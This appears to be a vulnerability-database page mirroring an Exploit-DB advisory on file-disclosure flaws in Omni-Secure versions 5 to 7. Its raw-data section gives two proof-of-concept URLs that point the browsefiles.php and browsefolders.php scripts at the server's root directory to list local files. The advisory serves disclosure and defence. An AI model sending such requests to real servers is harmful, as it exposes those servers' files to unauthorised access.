header-logo
Suggest Exploit
vendor:
Omni-Secure
by:
SecurityFocus
7,5
CVSS
HIGH
File-Disclosure
200
CWE
Product Name: Omni-Secure
Affected Version From: Omni-Secure 5
Affected Version To: Omni-Secure 7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Omni-Secure Multiple File-Disclosure Vulnerabilities

Omni-Secure is prone to multiple file-disclosure vulnerabilities. An attacker can exploit these issues to view local files in the context of the web server process. This may aid in further attacks.

Mitigation:

Ensure that the web server process does not have access to sensitive files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/56575/info

Omni-Secure is prone to multiple file-disclosure vulnerabilities.

An attacker can exploit these issues to view local files in the context of the web server process. This may aid in further attacks.

Versions Omni-Secure 5, 6 and 7 are vulnerable. 

http://www.example.co/mpath/lib/browsefiles.php?dir=/

http://www.example.co/mpath/lib/browsefolders.php?dir=/

Navigation

Suggest Exploit

Services By CQR